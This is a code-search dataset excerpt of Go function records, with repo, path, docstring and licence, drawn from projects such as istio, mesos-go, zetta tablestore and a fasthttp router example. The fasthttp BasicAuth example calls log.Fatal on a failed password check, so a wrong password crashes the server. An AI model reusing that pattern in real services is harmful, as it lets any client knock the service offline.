resp, err := client.con.Pipeline().Do(req)
if err != nil {
return PathsGetIntOneMillionResponse{}, err
}
if !runtime.HasStatusCode(resp, http.StatusOK) {
return PathsGetIntOneMillionResponse{}, client.getIntOneMillionHandleError(resp)
}
return PathsGetIntOneMillionResponse{RawResponse: resp}, nil
} | MIT License |
istio/old_pilot_repo | proxy/envoy/discovery_test.go | TestServiceDiscoveryListAllServices | go | func TestServiceDiscoveryListAllServices(t *testing.T) {
_, _, ds := commonSetup(t)
url := "/v1/registration/"
response := makeDiscoveryRequest(ds, "GET", url, t)
compareResponse(response, "testdata/all-sds.json", t)
} | Can we list Services? | https://github.com/istio/old_pilot_repo/blob/328700a0b55e097df7490e1fa7a0afdc24d80828/proxy/envoy/discovery_test.go#L127-L132 | package envoy
import (
"errors"
"fmt"
"io/ioutil"
"net/http"
"net/http/httptest"
"testing"
restful "github.com/emicklei/go-restful"
proxyconfig "istio.io/api/proxy/v1/config"
"istio.io/pilot/adapter/config/memory"
"istio.io/pilot/model"
"istio.io/pilot/proxy"
"istio.io/pilot/test/mock"
"istio.io/pilot/test/util"
)
type mockController struct {
handlers int
}
func (ctl *mockController) AppendServiceHandler(_ func(*model.Service, model.Event)) error {
ctl.handlers++
return nil
}
func (ctl *mockController) AppendInstanceHandler(_ func(*model.ServiceInstance, model.Event)) error {
ctl.handlers++
return nil
}
func (ctl *mockController) Run(_ <-chan struct{}) {}
var mockDiscovery *mock.ServiceDiscovery
func makeDiscoveryService(t *testing.T, r model.ConfigStore, mesh *proxyconfig.MeshConfig) *DiscoveryService {
mockDiscovery = mock.Discovery
mockDiscovery.ClearErrors()
out, err := NewDiscoveryService(
&mockController{},
nil,
proxy.Environment{
ServiceDiscovery: mockDiscovery,
ServiceAccounts: mockDiscovery,
IstioConfigStore: model.MakeIstioStore(r),
Mesh: mesh,
},
DiscoveryServiceOptions{
EnableCaching: true,
EnableProfiling: true,
})
if err != nil {
t.Fatalf("NewDiscoveryService failed: %v", err)
}
return out
}
func makeDiscoveryRequest(ds *DiscoveryService, method, url string, t *testing.T) []byte {
httpRequest, err := http.NewRequest(method, url, nil)
if err != nil {
t.Fatal(err)
}
httpWriter := httptest.NewRecorder()
container := restful.NewContainer()
ds.Register(container)
container.ServeHTTP(httpWriter, httpRequest)
body, err := ioutil.ReadAll(httpWriter.Result().Body)
if err != nil {
t.Fatal(err)
}
return body
}
func getDiscoveryResponse(ds *DiscoveryService, method, url string, t *testing.T) *http.Response {
httpRequest, err := http.NewRequest(method, url, nil)
if err != nil {
t.Fatal(err)
}
httpWriter := httptest.NewRecorder()
container := restful.NewContainer()
ds.Register(container)
container.ServeHTTP(httpWriter, httpRequest)
return httpWriter.Result()
}
func commonSetup(t *testing.T) (*proxyconfig.MeshConfig, model.ConfigStore, *DiscoveryService) {
mesh := makeMeshConfig()
registry := memory.Make(model.IstioConfigTypes)
ds := makeDiscoveryService(t, registry, &mesh)
return &mesh, registry, ds
}
func compareResponse(body []byte, file string, t *testing.T) {
err := ioutil.WriteFile(file, body, 0644)
if err != nil {
t.Fatalf(err.Error())
}
util.CompareYAML(file, t)
}
func TestServiceDiscovery(t *testing.T) {
_, _, ds := commonSetup(t)
url := "/v1/registration/" + mock.HelloService.Key(mock.HelloService.Ports[0], nil)
response := makeDiscoveryRequest(ds, "GET", url, t)
compareResponse(response, "testdata/sds.json", t)
} | Apache License 2.0 |
go-playground/log | log.go | WithDefaultFields | go | func WithDefaultFields(fields ...Field) {
logFields = append(logFields, fields...)
} | WithDefaultFields adds fields to the underlying logger instance | https://github.com/go-playground/log/blob/c55d790af58151ce9d42f83eb917a84f59b4d08a/log.go#L175-L177 | package log
import (
"context"
"os"
"sync"
"time"
"golang.org/x/crypto/ssh/terminal"
)
var (
bytePool = &ByteArrayPool{pool: &sync.Pool{
New: func() interface{} {
return make([]byte, 0, 32)
},
}}
defaultHandlerRegistered = false
defaultHandler *console
)
func init() {
if terminal.IsTerminal(int(os.Stdout.Fd())) {
defaultHandler = newDefaultLogger()
AddHandler(defaultHandler, AllLevels...)
defaultHandlerRegistered = true
}
}
const (
DefaultTimeFormat = "2006-01-02T15:04:05.000000000Z07:00"
)
var (
logFields []Field
logHandlers = map[Level][]Handler{}
exitFunc = os.Exit
withErrFn = errorsWithError
ctxIdent = &struct {
name string
}{
name: "log",
}
rw sync.RWMutex
)
type Field struct {
Key string `json:"key"`
Value interface{} `json:"value"`
}
func SetExitFunc(fn func(code int)) {
exitFunc = fn
}
func SetWithErrorFn(fn func(Entry, error) Entry) {
withErrFn = fn
}
func SetContext(ctx context.Context, e Entry) context.Context {
return context.WithValue(ctx, ctxIdent, e)
}
func GetContext(ctx context.Context) Entry {
v := ctx.Value(ctxIdent)
if v == nil {
return newEntryWithFields(nil)
}
return v.(Entry)
}
func BytePool() *ByteArrayPool {
return bytePool
}
func HandleEntry(e Entry) {
if !e.start.IsZero() {
e = e.WithField("duration", time.Since(e.start))
}
e.Timestamp = time.Now()
rw.RLock()
for _, h := range logHandlers[e.Level] {
h.Log(e)
}
rw.RUnlock()
}
func F(key string, value interface{}) Field {
return Field{Key: key, Value: value}
}
func AddHandler(h Handler, levels ...Level) {
rw.Lock()
defer rw.Unlock()
if defaultHandlerRegistered {
removeHandler(defaultHandler)
defaultHandler.Close()
defaultHandler = nil
defaultHandlerRegistered = false
}
for _, level := range levels {
handler := append(logHandlers[level], h)
logHandlers[level] = handler
}
}
func RemoveHandler(h Handler) {
rw.Lock()
removeHandler(h)
rw.Unlock()
}
func removeHandler(h Handler) {
OUTER:
for lvl, handlers := range logHandlers {
for i, handler := range handlers {
if h == handler {
n := append(handlers[:i], handlers[i+1:]...)
if len(n) == 0 {
delete(logHandlers, lvl)
continue OUTER
}
logHandlers[lvl] = n
continue OUTER
}
}
}
}
func RemoveHandlerLevels(h Handler, levels ...Level) {
rw.Lock()
defer rw.Unlock()
OUTER:
for _, lvl := range levels {
handlers := logHandlers[lvl]
for i, handler := range handlers {
if h == handler {
n := append(handlers[:i], handlers[i+1:]...)
if len(n) == 0 {
delete(logHandlers, lvl)
continue OUTER
}
logHandlers[lvl] = n
continue OUTER
}
}
}
} | MIT License |
root4loot/rescope | vendor/github.com/xo/terminfo/color.go | ChromaFormatterName | go | func (c ColorLevel) ChromaFormatterName() string {
switch c {
case ColorLevelBasic:
return "terminal"
case ColorLevelHundreds:
return "terminal256"
case ColorLevelMillions:
return "terminal16m"
}
return "noop"
} | ChromaFormatterName returns the github.com/alecthomas/chroma compatible
formatter name for the color level. | https://github.com/root4loot/rescope/blob/3423ba047ed5ac5d89822dbd88dc6e90f076e964/vendor/github.com/xo/terminfo/color.go#L35-L45 | package terminfo
import (
"os"
"strconv"
"strings"
)
type ColorLevel uint
const (
ColorLevelNone ColorLevel = iota
ColorLevelBasic
ColorLevelHundreds
ColorLevelMillions
)
func (c ColorLevel) String() string {
switch c {
case ColorLevelBasic:
return "basic"
case ColorLevelHundreds:
return "hundreds"
case ColorLevelMillions:
return "millions"
}
return "none"
} | MIT License |
fasthttp/router | _examples/auth/auth.go | BasicAuth | go | func BasicAuth(h fasthttp.RequestHandler, requiredUser string, requiredPasswordHash []byte) fasthttp.RequestHandler {
return func(ctx *fasthttp.RequestCtx) {
user, password, hasAuth := basicAuth(ctx)
if hasAuth && user == requiredUser {
err := scrypt.CompareHashAndPassword(requiredPasswordHash, []byte(password))
if err != nil {
log.Fatal(err)
} else {
h(ctx)
return
}
}
ctx.Error(fasthttp.StatusMessage(fasthttp.StatusUnauthorized), fasthttp.StatusUnauthorized)
ctx.Response.Header.Set("WWW-Authenticate", "Basic realm=Restricted")
}
} | BasicAuth is the basic auth handler | https://github.com/fasthttp/router/blob/e8b4c1b7a7f4e5faeaf0be3dd5c589744dca0553/_examples/auth/auth.go#L45-L81 | package main
import (
"encoding/base64"
"fmt"
"log"
"strings"
scrypt "github.com/elithrar/simple-scrypt"
"github.com/fasthttp/router"
"github.com/valyala/fasthttp"
)
func basicAuth(ctx *fasthttp.RequestCtx) (username, password string, ok bool) {
auth := ctx.Request.Header.Peek("Authorization")
if auth == nil {
return
}
return parseBasicAuth(string(auth))
}
func parseBasicAuth(auth string) (username, password string, ok bool) {
const prefix = "Basic "
if !strings.HasPrefix(auth, prefix) {
return
}
c, err := base64.StdEncoding.DecodeString(auth[len(prefix):])
if err != nil {
return
}
cs := string(c)
s := strings.IndexByte(cs, ':')
if s < 0 {
return
}
return cs[:s], cs[s+1:], true
} | BSD 3-Clause New or Revised License |
mesos/mesos-go | api/v1/lib/encoding/types.go | String | go | func (c *Codec) String() string {
if c == nil {
return ""
}
return c.Name
} | String implements the fmt.Stringer interface. | https://github.com/mesos/mesos-go/blob/de775c0c58642395394de8e54c6677063cfe3b1f/api/v1/lib/encoding/types.go#L67-L72 | package encoding
import (
"encoding/json"
"io"
pb "github.com/gogo/protobuf/proto"
"github.com/mesos/mesos-go/api/v1/lib/encoding/framing"
)
type MediaType string
func (m MediaType) ContentType() string { return string(m) }
type (
Source func() framing.Reader
Sink func() framing.Writer
Codec struct {
Name string
Type MediaType
NewEncoder func(Sink) Encoder
NewDecoder func(Source) Decoder
}
SourceFactory interface {
NewSource(r io.Reader) Source
}
SourceFactoryFunc func(r io.Reader) Source
SinkFactory interface {
NewSink(w io.Writer) Sink
}
SinkFactoryFunc func(w io.Writer) Sink
)
func (f SourceFactoryFunc) NewSource(r io.Reader) Source { return f(r) }
func (f SinkFactoryFunc) NewSink(w io.Writer) Sink { return f(w) }
var (
_ = SourceFactory(SourceFactoryFunc(nil))
_ = SinkFactory(SinkFactoryFunc(nil))
)
func SourceReader(r io.Reader) Source {
ch := make(chan framing.ReaderFunc, 1)
ch <- framing.ReadAll(r)
return func() framing.Reader {
select {
case f := <-ch:
return f
default:
return framing.ReaderFunc(framing.EOFReaderFunc)
}
}
}
func SinkWriter(w io.Writer) Sink { return func() framing.Writer { return framing.WriterFor(w) } } | Apache License 2.0 |
yomorun/y3-codec-golang | examples/primitive/bool/main.go | main | go | func main() {
var data bool = true
var prim = y3.NewPrimitivePacketEncoder(0x01)
prim.SetBoolValue(data)
buf := prim.Encode()
res, _, _, _ := y3.DecodePrimitivePacket(buf)
val, _ := res.ToBool()
fmt.Printf("val=%v", val)
} | Example of encoding and decoding bool type by using PrimitivePacket. | https://github.com/yomorun/y3-codec-golang/blob/a98ecabde90aed69252771e91ff879e175877978/examples/primitive/bool/main.go#L10-L20 | package main
import (
"fmt"
"github.com/yomorun/y3-codec-golang"
) | Apache License 2.0 |
packtworkshops/the-go-workshop | Chapter14/Activity14.02/solution/main_test.go | TestGetDataAndParseResponse | go | func TestGetDataAndParseResponse(t *testing.T) {
err := addNameAndParseResponse("Electric")
if err != nil {
t.Fatal(err)
}
err = addNameAndParseResponse("Boogaloo")
if err != nil {
t.Fatal(err)
}
names := getDataAndParseResponse()
if len(names) != 2 {
t.Error("values don't match")
}
} | TestGetDataAndParseResponse requires the server to be running to succeed | https://github.com/packtworkshops/the-go-workshop/blob/ee0def0b7432bf69985b318ccce231864a6205de/Chapter14/Activity14.02/solution/main_test.go#L8-L21 | package main
import (
"testing"
) | MIT License |
zhihu/zetta | tablestore/server/rpc_server.go | Commit | go | func (rs *RPCServer) Commit(ctx context.Context, req *tspb.CommitRequest) (*tspb.CommitResponse, error) {
queryCtx, err := rs.getQueryCtxBySessionID(req.Session)
if err != nil {
commitCounterGerneralErr.Inc()
return nil, err
}
sess := queryCtx.GetSession()
sess.SetLastActive(time.Now())
txnSel := &tspb.TransactionSelector{}
switch req.Transaction.(type) {
case *tspb.CommitRequest_SingleUseTransaction:
txnSel.Selector = &tspb.TransactionSelector_SingleUse{
SingleUse: req.GetSingleUseTransaction(),
}
case *tspb.CommitRequest_TransactionId:
txnSel.Selector = &tspb.TransactionSelector_Id{
Id: req.GetTransactionId(),
}
default:
return nil, status.Errorf(codes.Aborted, "unsupported transaction type %T", req.Transaction)
}
if len(req.Table) == 0 {
return nil, status.Error(codes.InvalidArgument, "missing field <table>")
}
isRawkv, err := sess.RawkvAccess(ctx, req.Table)
if err != nil {
return nil, status.Error(codes.Aborted, err.Error())
}
rtOpt := session.RetrieveTxnOpt{
Committable: true,
IsRawKV: isRawkv,
}
txn, err := sess.RetrieveTxn(ctx, txnSel, &rtOpt)
if err != nil {
commitCounterGerneralErr.Inc()
return nil, status.Errorf(codes.Aborted, "retrieve session transaction failed %v", err)
}
startTS := time.Now()
r, err := sess.HandleMutate(ctx, req, txn)
durMutate := time.Since(startTS)
if err != nil {
executeMutateDurationGeneralErr.Observe(durMutate.Seconds())
commitCounterGerneralErr.Inc()
return nil, err
}
executeMutateDurationGeneralOK.Observe(durMutate.Seconds())
commitCounterGerneralOK.Inc()
return rpc.BuildCommitResponse(r), nil
} | Commit commits a transaction. The request includes the mutations to be
applied to rows in the database.
`Commit` might return an `ABORTED` error. This can occur at any time;
commonly, the cause is conflicts with concurrent
transactions. However, it can also happen for a variety of other
reasons. If `Commit` returns `ABORTED`, the caller should re-attempt
the transaction from the beginning, re-using the same session. | https://github.com/zhihu/zetta/blob/3903214c1bb05272931aaf958ae1aa00d6529b5a/tablestore/server/rpc_server.go#L633-L682 | package server
import (
"context"
"fmt"
"io"
"sync"
"sync/atomic"
"time"
"go.uber.org/zap"
"google.golang.org/grpc"
"google.golang.org/grpc/codes"
"google.golang.org/grpc/status"
emptypb "github.com/gogo/protobuf/types"
grpc_middleware "github.com/grpc-ecosystem/go-grpc-middleware"
grpc_opentracing "github.com/grpc-ecosystem/go-grpc-middleware/tracing/opentracing"
grpc_prometheus "github.com/grpc-ecosystem/go-grpc-prometheus"
"github.com/pingcap/tidb/util/logutil"
tspb "github.com/zhihu/zetta-proto/pkg/tablestore"
"github.com/zhihu/zetta/pkg/metrics"
"github.com/zhihu/zetta/tablestore/domain"
"github.com/zhihu/zetta/tablestore/rpc"
"github.com/zhihu/zetta/tablestore/session"
"github.com/zhihu/zetta/tablestore/sessionctx"
)
var (
grpcMetrics = grpc_prometheus.NewServerMetrics()
createSessionGerneralOK = metrics.CreateSessionCounter.WithLabelValues(metrics.LblGeneral, metrics.LblOK)
deleteSessionGerneralOK = metrics.DeleteSessionCounter.WithLabelValues(metrics.LblGeneral, metrics.LblOK)
readCounterGerneralOK = metrics.ReadCounter.WithLabelValues(metrics.LblGeneral, metrics.LblOK)
readCounterGerneralErr = metrics.ReadCounter.WithLabelValues(metrics.LblGeneral, metrics.LblError)
streamReadCounterGerneralOK = metrics.StreamReadCounter.WithLabelValues(metrics.LblGeneral, metrics.LblOK)
streamReadCounterGerneralErr = metrics.StreamReadCounter.WithLabelValues(metrics.LblGeneral, metrics.LblError)
sparseReadCounterGerneralOK = metrics.SparseReadCounter.WithLabelValues(metrics.LblGeneral, metrics.LblOK)
sparseReadCounterGerneralErr = metrics.SparseReadCounter.WithLabelValues(metrics.LblGeneral, metrics.LblError)
commitCounterGerneralOK = metrics.CommitCounter.WithLabelValues(metrics.LblGeneral, metrics.LblOK)
commitCounterGerneralErr = metrics.CommitCounter.WithLabelValues(metrics.LblGeneral, metrics.LblError)
mutateCounterGerneralOK = metrics.MutateCounter.WithLabelValues(metrics.LblGeneral, metrics.LblOK)
mutateCounterGerneralErr = metrics.MutateCounter.WithLabelValues(metrics.LblGeneral, metrics.LblError)
executeMutateDurationGeneralOK = metrics.ExecuteMutateDuration.WithLabelValues(metrics.LblGeneral, metrics.LblOK)
executeMutateDurationGeneralErr = metrics.ExecuteMutateDuration.WithLabelValues(metrics.LblGeneral, metrics.LblError)
executeReadDurationGeneralOK = metrics.ExecuteReadDuration.WithLabelValues(metrics.LblGeneral, metrics.LblOK)
executeReadDurationGeneralErr = metrics.ExecuteReadDuration.WithLabelValues(metrics.LblGeneral, metrics.LblError)
)
type RPCServer struct {
s *Server
rpc *grpc.Server
mu sync.Mutex
tspb.TablestoreAdminServer
tspb.TablestoreServer
}
func NewRPCServer(s *Server) *RPCServer {
rs := &RPCServer{s: s}
unaryInterceptor := grpc_middleware.ChainUnaryServer(
grpc_prometheus.UnaryServerInterceptor,
grpc_opentracing.UnaryServerInterceptor(),
)
streamInterceptor := grpc_middleware.ChainStreamServer(
grpc_prometheus.StreamServerInterceptor,
grpc_opentracing.StreamServerInterceptor(),
)
rs.rpc = grpc.NewServer(
grpc.StreamInterceptor(streamInterceptor),
grpc.UnaryInterceptor(unaryInterceptor),
)
tspb.RegisterTablestoreAdminServer(rs.rpc, rs)
tspb.RegisterTablestoreServer(rs.rpc, rs)
return rs
}
func (rs *RPCServer) Run() {
go rs.rpc.Serve(rs.s.listener)
}
func (rs *RPCServer) Close() {
rs.mu.Lock()
defer rs.mu.Unlock()
rs.rpc.GracefulStop()
}
func (rs *RPCServer) CreateSession(ctx context.Context, req *tspb.CreateSessionRequest) (*tspb.Session, error) {
if req.Database == "" {
return nil, status.Errorf(codes.InvalidArgument, "database null")
}
is := domain.GetOnlyDomain().InfoSchema()
if _, ok := is.GetDatabaseMetaByName(req.Database); !ok {
return nil, status.Errorf(codes.NotFound, "no such database %s", req.Database)
}
queryID := atomic.AddUint32(&baseQueryID, 1)
rs.s.rwlock.Lock()
defer rs.s.rwlock.Unlock()
if len(rs.s.queryCtxs)+1 > rs.s.cfg.MaxSessions {
return nil, status.Errorf(codes.ResourceExhausted, "session count exceed max-sesions %v", rs.s.cfg.MaxSessions)
}
qctx, err := rs.s.driver.OpenCtx(uint64(queryID), req.Database)
if err != nil {
return nil, status.Errorf(codes.Internal, "open query ctx error %v", err)
}
if req.Session != nil {
qctx.GetSession().SetLabels(req.Session.Labels)
}
rs.s.queryCtxs[qctx.GetSession().GetName()] = qctx
createSessionGerneralOK.Add(1)
return qctx.GetSession().ToProto(), nil
}
func (rs *RPCServer) BatchCreateSessions(ctx context.Context, req *tspb.BatchCreateSessionsRequest) (*tspb.BatchCreateSessionsResponse, error) {
if req.Database == "" {
return nil, status.Errorf(codes.InvalidArgument, "database null")
}
is := domain.GetOnlyDomain().InfoSchema()
if _, ok := is.GetDatabaseMetaByName(req.Database); !ok {
return nil, status.Errorf(codes.NotFound, "no such database %s", req.Database)
}
if req.SessionTemplate == nil {
return nil, status.Errorf(codes.InvalidArgument, "session template is required")
}
var sessions []*tspb.Session
rs.s.rwlock.Lock()
defer rs.s.rwlock.Unlock()
if len(rs.s.queryCtxs)+int(req.GetSessionCount()) > rs.s.cfg.MaxSessions {
return nil, status.Errorf(codes.ResourceExhausted, "session count exceed max-sesions %v", rs.s.cfg.MaxSessions)
}
for i := int32(0); i < req.GetSessionCount(); i++ {
queryID := atomic.AddUint32(&baseQueryID, 1)
qctx, err := rs.s.driver.OpenCtx(uint64(queryID), req.Database)
if err != nil {
return nil, status.Errorf(codes.Aborted, "create session error %v", err)
}
qctx.GetSession().SetLabels(req.SessionTemplate.Labels)
rs.s.queryCtxs[qctx.GetSession().GetName()] = qctx
sessions = append(sessions, qctx.GetSession().ToProto())
createSessionGerneralOK.Add(1)
}
return &tspb.BatchCreateSessionsResponse{Session: sessions}, nil
}
func (rs *RPCServer) GetSession(ctx context.Context, req *tspb.GetSessionRequest) (*tspb.Session, error) {
rs.s.rwlock.RLock()
defer rs.s.rwlock.RUnlock()
queryCtx, ok := rs.s.queryCtxs[req.Name]
if !ok {
return nil, status.Errorf(codes.NotFound, "session %s not found", req.Name)
}
session := queryCtx.GetSession()
session.SetLastActive(time.Now())
return session.ToProto(), nil
}
func (rs *RPCServer) ListSessions(ctx context.Context, req *tspb.ListSessionsRequest) (*tspb.ListSessionsResponse, error) {
rs.s.rwlock.RLock()
defer rs.s.rwlock.RUnlock()
sessions := []*tspb.Session{}
for _, qctx := range rs.s.queryCtxs {
sess := qctx.GetSession().ToProto()
sessions = append(sessions, sess)
}
rsp := &tspb.ListSessionsResponse{
Sessions: sessions,
}
return rsp, nil
}
func (rs *RPCServer) DeleteSession(ctx context.Context, req *tspb.DeleteSessionRequest) (*emptypb.Empty, error) {
rs.s.rwlock.Lock()
defer rs.s.rwlock.Unlock()
queryCtx, ok := rs.s.queryCtxs[req.Name]
if !ok {
return &emptypb.Empty{}, nil
}
if err := queryCtx.Close(); err != nil {
logutil.Logger(ctx).Error("session close error", zap.Error(err), zap.String("session", req.Name))
return nil, status.Errorf(codes.Aborted, fmt.Sprintf("session %s close error, try later", req.Name))
}
delete(rs.s.queryCtxs, req.Name)
deleteSessionGerneralOK.Add(1)
return &emptypb.Empty{}, nil
}
func (rs *RPCServer) Read(ctx context.Context, req *tspb.ReadRequest) (*tspb.ResultSet, error) {
queryCtx, err := rs.getQueryCtxBySessionID(req.Session)
if err != nil {
readCounterGerneralErr.Inc()
return nil, err
}
if len(req.ResumeToken) > 0 {
return nil, fmt.Errorf("read resumption not supported")
}
if len(req.PartitionToken) > 0 {
return nil, fmt.Errorf("partition restrictions not supported")
}
if req.GetTransaction() == nil {
readCounterGerneralErr.Inc()
return nil, status.Error(codes.FailedPrecondition, "no transaction selector in grpc request")
}
sess := queryCtx.GetSession()
sess.SetLastActive(time.Now())
isRawkv, err := sess.RawkvAccess(ctx, req.Table)
if err != nil {
return nil, status.Error(codes.Aborted, err.Error())
}
rtOpt := session.RetrieveTxnOpt{
Committable: false,
IsRawKV: isRawkv,
}
txn, err := sess.RetrieveTxn(ctx, req.GetTransaction(), &rtOpt)
if err != nil {
readCounterGerneralErr.Inc()
logutil.Logger(ctx).Error("fetch transaction error", zap.Error(err))
return nil, err
}
startTS := time.Now()
ri, err := queryCtx.GetSession().HandleRead(ctx, req, txn)
if err != nil {
readCounterGerneralErr.Inc()
logutil.Logger(ctx).Error("read error", zap.Error(err))
return nil, err
}
resultSet, err := rs.readRows(ctx, ri)
durRead := time.Since(startTS)
if err != nil {
executeReadDurationGeneralErr.Observe(durRead.Seconds())
sparseReadCounterGerneralErr.Inc()
return nil, err
}
executeReadDurationGeneralOK.Observe(durRead.Seconds())
readCounterGerneralOK.Inc()
return resultSet, nil
}
func (rs *RPCServer) readRows(ctx context.Context, ri session.RecordSet) (*tspb.ResultSet, error) {
resultSet := &tspb.ResultSet{
Metadata: buildResultSetMetaData(ri.Columns()),
Rows: []*tspb.ListValue{},
}
for {
row, err := ri.Next(ctx)
if err != nil {
break
}
resultSet.SliceRows = append(resultSet.SliceRows, row.(*tspb.SliceCell))
}
if ri.LastErr() != nil {
return nil, ri.LastErr()
}
return resultSet, nil
}
func (rs *RPCServer) SparseRead(ctx context.Context, req *tspb.SparseReadRequest) (*tspb.ResultSet, error) {
queryCtx, err := rs.getQueryCtxBySessionID(req.Session)
if err != nil {
sparseReadCounterGerneralErr.Inc()
return nil, err
}
if len(req.ResumeToken) > 0 {
return nil, fmt.Errorf("read resumption not supported")
}
if len(req.PartitionToken) > 0 {
return nil, fmt.Errorf("partition restrictions not supported")
}
if req.GetTransaction() == nil {
sparseReadCounterGerneralErr.Inc()
return nil, status.Error(codes.FailedPrecondition, "no transaction selector in grpc request")
}
sess := queryCtx.GetSession()
sess.SetLastActive(time.Now())
isRawkv, err := sess.RawkvAccess(ctx, req.Table)
if err != nil {
return nil, status.Error(codes.Aborted, err.Error())
}
rtOpt := session.RetrieveTxnOpt{
Committable: false,
IsRawKV: isRawkv,
}
txn, err := sess.RetrieveTxn(ctx, req.GetTransaction(), &rtOpt)
if err != nil {
sparseReadCounterGerneralErr.Inc()
logutil.Logger(ctx).Error("fetch transaction error", zap.Error(err))
return nil, err
}
startTS := time.Now()
ri, err := queryCtx.GetSession().HandleRead(ctx, req, txn)
if err != nil {
sparseReadCounterGerneralErr.Inc()
logutil.Logger(ctx).Error("read error", zap.Error(err))
return nil, err
}
resultSet, err := rs.readRows(ctx, ri)
durRead := time.Since(startTS)
if err != nil {
executeReadDurationGeneralErr.Observe(durRead.Seconds())
sparseReadCounterGerneralErr.Inc()
return resultSet, err
}
executeReadDurationGeneralOK.Observe(durRead.Seconds())
sparseReadCounterGerneralOK.Inc()
return resultSet, nil
}
func (rs *RPCServer) SparseScan(ctx context.Context, req *tspb.SparseScanRequest) (*tspb.ResultSet, error) {
queryCtx, err := rs.getQueryCtxBySessionID(req.Session)
if err != nil {
sparseReadCounterGerneralErr.Inc()
return nil, err
}
if len(req.ResumeToken) > 0 {
return nil, fmt.Errorf("read resumption not supported")
}
if len(req.PartitionToken) > 0 {
return nil, fmt.Errorf("partition restrictions not supported")
}
if req.GetTransaction() == nil {
sparseReadCounterGerneralErr.Inc()
return nil, status.Error(codes.FailedPrecondition, "no transaction selector in grpc request")
}
sess := queryCtx.GetSession()
sess.SetLastActive(time.Now())
isRawkv, err := sess.RawkvAccess(ctx, req.Table)
if err != nil {
return nil, status.Error(codes.Aborted, err.Error())
}
rtOpt := session.RetrieveTxnOpt{
Committable: false,
IsRawKV: isRawkv,
}
txn, err := sess.RetrieveTxn(ctx, req.GetTransaction(), &rtOpt)
if err != nil {
sparseReadCounterGerneralErr.Inc()
logutil.Logger(ctx).Error("fetch transaction error", zap.Error(err))
return nil, err
}
startTS := time.Now()
ri, err := queryCtx.GetSession().HandleRead(ctx, req, txn)
if err != nil {
sparseReadCounterGerneralErr.Inc()
logutil.Logger(ctx).Error("read error", zap.Error(err))
return nil, err
}
resultSet, err := rs.readRows(ctx, ri)
durRead := time.Since(startTS)
if err != nil {
executeReadDurationGeneralErr.Observe(durRead.Seconds())
sparseReadCounterGerneralErr.Inc()
return resultSet, err
}
executeReadDurationGeneralOK.Observe(durRead.Seconds())
sparseReadCounterGerneralOK.Inc()
return resultSet, nil
}
func (rs *RPCServer) Mutate(ctx context.Context, req *tspb.MutationRequest) (*tspb.MutationResponse, error) {
queryCtx, err := rs.getQueryCtxBySessionID(req.Session)
if err != nil {
mutateCounterGerneralErr.Inc()
return nil, err
}
sess := queryCtx.GetSession()
sess.SetLastActive(time.Now())
if req.GetTransaction() == nil {
return nil, status.Errorf(codes.FailedPrecondition, "transaction selector should be specific")
}
isRawkv, err := sess.RawkvAccess(ctx, req.Table)
if err != nil {
return nil, status.Error(codes.Aborted, err.Error())
}
rtOpt := session.RetrieveTxnOpt{
Committable: true,
IsRawKV: isRawkv,
}
txn, err := sess.RetrieveTxn(ctx, req.GetTransaction(), &rtOpt)
if err != nil {
mutateCounterGerneralErr.Inc()
return nil, status.Errorf(codes.Aborted, "retrieve session transaction failed %v", err)
}
startTS := time.Now()
r, err := sess.HandleMutate(ctx, req, txn)
durMutate := time.Since(startTS)
if err != nil {
executeMutateDurationGeneralErr.Observe(durMutate.Seconds())
mutateCounterGerneralErr.Inc()
return nil, err
}
executeMutateDurationGeneralOK.Observe(durMutate.Seconds())
mutateCounterGerneralOK.Inc()
return rpc.BuildMutationResponse(r), nil
}
func (rs *RPCServer) StreamingRead(req *tspb.ReadRequest, stream tspb.Tablestore_StreamingReadServer) error {
queryCtx, err := rs.getQueryCtxBySessionID(req.Session)
if err != nil {
streamReadCounterGerneralErr.Inc()
return err
}
sess := queryCtx.GetSession()
sess.SetLastActive(time.Now())
isRawkv, err := sess.RawkvAccess(stream.Context(), req.Table)
if err != nil {
return status.Error(codes.Aborted, err.Error())
}
rtOpt := session.RetrieveTxnOpt{
Committable: false,
IsRawKV: isRawkv,
}
txn, err := sess.RetrieveTxn(stream.Context(), req.GetTransaction(), &rtOpt)
if err != nil {
streamReadCounterGerneralErr.Inc()
logutil.Logger(stream.Context()).Error("fetch transaction error", zap.Error(err))
return err
}
ri, err := queryCtx.GetSession().HandleRead(stream.Context(), req, txn)
if err != nil {
streamReadCounterGerneralErr.Inc()
logutil.Logger(stream.Context()).Error("mutate error", zap.Error(err))
return status.Error(codes.Aborted, err.Error())
}
return rs.readStream(stream.Context(), ri, stream.Send)
}
func (rs *RPCServer) readStream(ctx context.Context, ri session.RecordSet, send func(*tspb.PartialResultSet) error) error {
var (
row interface{}
err error
)
startTS := time.Now()
rsm := buildResultSetMetaData(ri.Columns())
for {
row, err = ri.Next(ctx)
if err != nil {
break
}
prs := &tspb.PartialResultSet{
Metadata: rsm,
RowCells: row.(*tspb.SliceCell),
}
if err = send(prs); err != nil {
break
}
rsm = nil
}
durRead := time.Since(startTS)
if ri.LastErr() != nil || (err != nil && err != io.EOF) {
streamReadCounterGerneralErr.Inc()
executeReadDurationGeneralErr.Observe(durRead.Seconds())
if ri.LastErr() != nil {
return ri.LastErr()
}
return err
}
executeReadDurationGeneralOK.Observe(durRead.Seconds())
streamReadCounterGerneralOK.Inc()
return nil
}
func (rs *RPCServer) StreamingSparseRead(req *tspb.SparseReadRequest, stream tspb.Tablestore_StreamingSparseReadServer) error {
queryCtx, err := rs.getQueryCtxBySessionID(req.Session)
if err != nil {
streamReadCounterGerneralErr.Inc()
return err
}
sess := queryCtx.GetSession()
sess.SetLastActive(time.Now())
isRawkv, err := sess.RawkvAccess(stream.Context(), req.Table)
if err != nil {
return status.Error(codes.Aborted, err.Error())
}
rtOpt := session.RetrieveTxnOpt{
Committable: false,
IsRawKV: isRawkv,
}
txn, err := sess.RetrieveTxn(stream.Context(), req.GetTransaction(), &rtOpt)
if err != nil {
streamReadCounterGerneralErr.Inc()
logutil.Logger(stream.Context()).Error("fetch transaction error", zap.Error(err))
return err
}
ctx := sessionctx.SetStreamReadKey(stream.Context())
ri, err := queryCtx.GetSession().HandleRead(ctx, req, txn)
if err != nil {
streamReadCounterGerneralErr.Inc()
logutil.Logger(stream.Context()).Error("stream sparse read error", zap.Error(err))
return status.Error(codes.Aborted, err.Error())
}
return rs.readStream(ctx, ri, stream.Send)
}
func (rs *RPCServer) StreamingSparseScan(req *tspb.SparseScanRequest, stream tspb.Tablestore_StreamingSparseScanServer) error {
queryCtx, err := rs.getQueryCtxBySessionID(req.Session)
if err != nil {
streamReadCounterGerneralErr.Inc()
return err
}
